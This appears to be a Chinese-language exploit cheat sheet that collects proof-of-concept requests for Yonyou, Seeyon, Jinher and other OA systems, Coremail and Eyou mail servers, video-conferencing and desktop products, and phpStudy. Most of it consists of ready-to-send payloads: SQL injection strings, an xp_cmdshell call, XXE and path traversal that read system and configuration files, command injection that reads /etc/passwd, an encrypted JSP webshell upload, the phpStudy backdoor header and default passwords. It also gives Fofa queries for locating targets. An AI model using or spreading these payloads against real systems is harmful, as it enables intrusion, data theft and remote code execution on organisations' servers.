/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml  #数据库配置文件

用友 UFIDA OA SQLi

POC | Payload | exp

/service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false&param_orgpk=level_code&retType=unit_code&Operation=Search&action=nc.ui.iufo.web.reference.base.UnitTableRefAction&method=execute

用友 UFIDA OA Web Service 默认后台自动登录

POC | Payload | exp

后台：/uapws/   自动登录,默认密码：111111(6)

用友 UFIDA OA XXE

POC | Payload | exp

/uapws/soapFormat.ajax

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///c:/windows/"> ]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<soap:Fault>
<faultcode>soap:Server%26xxe1two%3b</faultcode>
</soap:Fault>
</soap:Body>
</soap:Envelope>%0a

用友 UFIDA OA Web Service SQLi

POC | Payload | exp

/uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService?wsdl
/uapws/service/nc.itf.bd.crm.ICustomerExportToCrmService?wsdl

POST包:
POST /uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService HTTP/1.1
Host: **xxx.xxx.com**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 646

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"                     xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  xmlns:xsd="http://www.w3.org/1999/XMLSchema"  xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"  xmlns:m0="http://tempuri.org/"  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://crm.bd.itf.nc/ICurrtypeExportToCrmService" xmlns:urn2="http://pub.vo.nc/BusinessException" xmlns:urn3="http://ws.uap.nc/lang">     <SOAP-ENV:Header/>     <SOAP-ENV:Body>        <urn:exportCurrtypeToCrm>           <string>1</string>        </urn:exportCurrtypeToCrm>     </SOAP-ENV:Body></SOAP-ENV:Envelope>

致远 OA A6 setextno.jsp sql注入漏洞

POC | Payload | exp

/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17) union all select 1,2,@@version,user()%23
/yyoa/ext/trafaxserver/downloadAtt.jsp?attach_ids=(1) and 1=2 union select 1,2,3,4,5,concat(0x23,user(),0x23,version(),0x23),7--

CNNVD-201610-923 && 用友 GRP-U8 SQL 注入

POC | Payload | exp

用友GRP-U8 SQL注入
用友GRP-U8行政事业财务管理软件 SQL注入 CNNVD-201610-923
用友 GRP-U8 SQL 注入复现外加发一个通用注入点

用友GRP-U8行政事业财务管理软件 SQL注入 CNNVD-201610-923

POST /Proxy HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: host

cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'ipconfig'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>

用友 U8 OA test.jsp SQL注入漏洞

Fofa: "用友U8-OA"

POC | Payload | exp

/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))

用友 NCCloud FS文件管理SQL注入

Fofa: "NCCloud"

POC | Payload | exp

http://xxx.xxx.xxx.xxx/fs/
使用 Sqlmap 对 username 参数 进行 SQL 注入

用友 NC DeleteServlet 反序列化

相关文章
- 用友NC反序列化漏洞简单记录(DeleteServlet、XbrlPersistenceServlet等)

用友 NC XbrlPersistenceServlet反序列化

POC | Payload | exp
- 用友 NC XbrlPersistenceServlet反序列化

用友 NC FileReceiveServlet反序列化

相关文章
POC | Payload | exp
- 用友NC任意文件上传漏洞复现

用友 NC monitorservlet 反序列化

相关文章
- 用友nc 反序列化回显构造思路

用友 NC ServiceDispatcherServlet 反序列化

相关文章
- 用友NC反序列化简单分析

CNVD-2022-60632 用友畅捷通T+ 文件上传

新点

Fofa : app="新点OA"

敏感信息泄露漏洞

POC | Payload | exp

/ExcelExport/人员列表.xls
通过获取的登录名登陆后台(默认密码11111)

万户

fofa: app="万户网络-CMS"

万户ezeip 3.0任意文件下载

POC | Payload | exp
```
/download.ashx?files=../web.config
```

ezEIP 4.0 SQL注入

POC | Payload | exp

POST /label/ajax/hit.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

type=0&colid=3&itemid=6&f=hits'

EzEIP 4.1.0 信息洩露漏洞

POC | Payload | exp

GET /label/member/getinfo.aspx
Cookie: WHIR_USERINFOR=whir_mem_member_pid=1;

红帆

Fofa : app="红帆-ioffice"

老版本 SQL注入

POC | Payload | exp

POST /ioffice/prg/set/wss/ioCtlSet.asmx HTTP/1.1
Host: **.**.**.**
SOAPAction: "http://**.**.**.**/SignOut"
Content-Type: text/xml; charset=utf-8

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://**.**.**.**/soap/envelope/" xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance" xmlns:xsd="http://**.**.**.**/2001/XMLSchema">
<soap:Body>
    <SignOut xmlns="http://**.**.**.**/">
    <SessionID>'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'</SessionID>
    </SignOut>
</soap:Body>
</soap:Envelope>

金和

Fofa : app="Jinher-OA"

金和OA C6 download.jsp 任意文件读取漏洞

POC | Payload | exp

/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config

金和OA C6 EditMain.aspx 后台文件写入漏洞

POC | Payload | exp

/C6/JHSoft.Web.Portal/EditMain.aspx?id=cmdshell.aspx

/C6/JHSoft.Web.Portal/Default/cmdshell.aspx

金和OA C6 DossierBaseInfoView.aspx 后台越权信息泄露漏洞

POC | Payload | exp

/C6/JHSoft.Web.Dossier/DossierBaseInfoView.aspx?CollID=1&UserID=RY120330

华天

Fofa : app="华天动力-OA8000"

workFlowService SQL注入漏洞

POC | Payload | exp

POST /OAapp/bfapp/buffalo/workFlowService HTTP/1.1


<buffalo-call>
<method>getDataListForTree</method>
<string>select user()</string>
</buffalo-call>

SuiteCRM

CVE-2021-45897 SuiteCRM 远程命令执行漏洞

相关文章
- CVE-2021-45897 全球最大CRM系统SuiteCRM远程命令执行漏洞分析与复现

邮服

Exchange

Exchange

亿邮电子邮件系统

fofa: body="亿邮电子邮件系统"

亿邮电子邮件系统远程命令执行

POC | Payload | exp

POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
Host: x.x.x.x
Content-Length: 25
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chro·me/89.0.4389.114 Safari/537.36

type='|cat /etc/passwd||'

Coremail

官网 : https://www.coremail.cn/

Coremail 论客邮件系统于2000年首发，是中国第一套中文邮件系统。是网易等运营商至今一直使用的邮件系统，也是政府机关、大学、金融机构、上市公司及其他大型企业(包含国有企业)广泛使用的邮件系统。

相关工具

dpu/coremail-address-book - Coremail邮件系统组织通讯录一键导出

版本信息

POC | Payload | exp
```
/coremail/s/json?func=verify
```

爆破用户名

POC | Payload | exp

/coremail/s?func=user:getLocaleUserName
{
"email":"zhangsan"
"defaultURL":"1"
}

任意密码修改

相关文章
- Coremail nday 任意密码修改复现

配置文件信息泄漏

POC | Payload | exp
```
/mailsms/s?func=ADMIN:appState&dumpConfig=/
```
- yuxiaoyou123/coremail-exp

CVE-2020-29133 Coremail 存储型XSS

POC | Payload | exp

coremail/XT5/jsp/upload.jsp  上传 1.jpg.html

目录穿越泄漏后台漏洞

相关文章
- coremail漏洞之我见(碎碎念)
描述
访问过去会直接跳转到 tomcat 控制台，这里你就可以采用 coremail/coremail 弱口令尝试登陆，或者暴力破解。然后就是部署 war 包 Getshell 就 ok 了。
POC | Payload | exp
```
/lunkr/cache/;/;/../../manager.html
```

文件上传

POC | Payload | exp

jimoyong/CoreMailUploadRce

POST /webinst/action.jsp HTTP/1.1
Host:
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 99

func=checkserver&webServerName=127.0.0.1:6132/%0d@/home/coremail/web/webapp/justtest.jsp%20shenye

/coremail/justtest.jsp

Other

NVMS-1000

Fofa : app="TVT-NVMS-1000"

路径遍历漏洞

POC | Payload | exp

GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: **.**.**.**
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: close

远秋医学技能考试系统

Fofa : 远秋医学技能考试系统

SQL注入漏洞

POC | Payload | exp
```
/NewsDetailPage.aspx?key=news&id=1
```

汉王人脸考勤管理系统

Fofa : title="汉王人脸考勤管理系统"

万能密码

POC | Payload | exp
```
用户名 user: or' or 1=1--
密码 or
```

SQL 注入

POC | Payload | exp

POST /Login/Check HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 26
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://xxx.xxx.xxx.xxx:10000
Referer: http://xxx.xxx.xxx.xxx:10000/Login/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ASP.NET_SessionId=yr1cr5dd5c4g5tl33pu2yyep
Connection: close

strName=admin&strPwd=admin

会捷通云视讯平台

相关文章

会捷通云视讯平台2洞复现

登陆逻辑漏洞

POC | Payload | exp

修改错误返回包 为正确的返回包

{"token":null,"result":null}

任意文件读取

POC | Payload | exp

POST /fileDownload?action=downloadBackupFile HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

fullPath=/etc/passwd

目录遍历

POC | Payload | exp

/him/api/rest/V1.0/system/log/list?filePath=../

好视通视频会议系统

fofa: app="Hanming-Video-Conferencing"

任意文件下载

POC | Payload | exp

/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini

和信云桌面

fofa: body="和信下一代云桌面"

核心创天云桌面系统远程命令执行

POC | Payload | exp

POST /Upload/upload_file.php?l=test HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,fil;q=0.8
Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv
Content-Length: 183

------WebKitFormBoundaryfcKRltGv
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/avif

<?php phpinfo(); ?>
------WebKitFormBoundaryfcKRltGv--

联软准入系统

联软准入系统任意文件上传

POC | Payload | exp

联软准入系统任意文件上传

POST /uai/download/uploadfileToPath.htm HTTP/1.1
HOST: xxxxx

-----------------------------570xxxxxxxxx6025274xxxxxxxx1
Content-Disposition: form-data; name="input_localfile"; filename="xxx.jsp"
Content-Type: image/png

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

-----------------------------570xxxxxxxxx6025274xxxxxxxx1
Content-Disposition: form-data; name="uploadpath"

../webapps/notifymsg/devreport/
-----------------------------570xxxxxxxxx6025274xxxxxxxx1--

ClusterEngine

Fofa: title="TSCEV4.0"

CVE-2020-21224

NS-Sp4ce/Inspur

华视美达

相关文章

记一次前台sql到rce代审

Centos-Web-Panel

CVE-2018-18323

POC | Payload | exp
- https://packetstormsecurity.com/files/149795/Centos-Web-Panel-0.9.8.480-XSS-LFI-Code-Execution.html
```
/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd
```

CVE-2021-45467

相关文章
- CVE-2021-45467: CWP CentOS Web Panel - preauth RCE - stristr() 绕过

WebPageTest

相关文章

The Tale of a Click leading to RCE

Oracle Access Manager

CVE-2021-35587

相关文章
- CVE-2021-35587 Oracle Access Manager反序列化漏洞分析与命令回显构造

RDWA

相关工具

p0dalirius/RDWArecon - A python script to extract information from a Microsoft Remote Desktop Web Access (RDWA) application

Phpstudy

Phpstudy 后门 RCE

POC | Payload | exp

GET /1.php HTTP/1.1
Host: example.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9
Accept-Encoding:gzip,deflate
Accept-Charset:这里就是要执行的命令base64加密 c3lzdGVtKCdjYWxjLmV4ZScpOw==
Cookie: UM_distinctid=16ae380e49f27e-0987ab403bca49-3c604504-1fa400-16ae380e4a011b; CNZZDATA3801251=cnzz_eid%3D1063495559-1558595034-%26ntime%3D1559102092; CNZZDATA1670348=cnzz_eid%3D213162126-1559207282-%26ntime%3D1559207282
Connection: close

PhpStudy nginx 解析漏洞

描述
此次漏洞是 Nginx 的解析漏洞，由于 phpstudy 中配置文件的不当，造成了 / xx.php 解析漏洞，故此将文件解析为 php 运行。
相关文章
- phpStudy默认配置致Nginx解析漏洞复现
POC | Payload | exp
需要把 php 恶意文件上传到服务器。
```
<?php phpinfo();?>
```
通过 /x.txt/x.php 方式访问上传的图片地址,解析 php 代码。

点击关注，共同学习！安全狗的自我修养

github haidragon

https://github.com/haidragon

学习笔记-B/S - Exploits

B/S - Exploits

免责声明

大纲

各类论坛/CMS框架

74CMS

AEN

aspcms

dedeCMS

Discuz

Discuz

Discuz!ML

Drupal

ECshop

Fastadmin

Laravel

jeecg

jeewms

Joomla

Maccms

MetInfo

October

pBootCMS

php7cms

PHPMyWind

RuoYi

SeaCMS

ShopXO

Sitecore

SiteServer

ThinkAdmin

ThinkCMF

ThinkPHP

<5

5

>5

TPshop

UCMS

vBulletin

Weiphp

WordPress

XYHCMS

Yii

YxCMS

zcncms

Zend

五指cms

框架引擎中间件

ActiveMQ

Axis

CAS

Cocoon

ColdFusion

Druid

Alibaba_Druid

Apache_Druid

Dubbo

ElasticSearch

Flink

httpd

IIS

JBOSS

Jetty

Nacos

Resin

Nginx

RabbitMQ

RocketMQ

Shiro

Solr

Spring

Struts2

Tapestry

Tomcat

uWSGI

Weblogic

Websphere

组件

编辑器

ewebeditor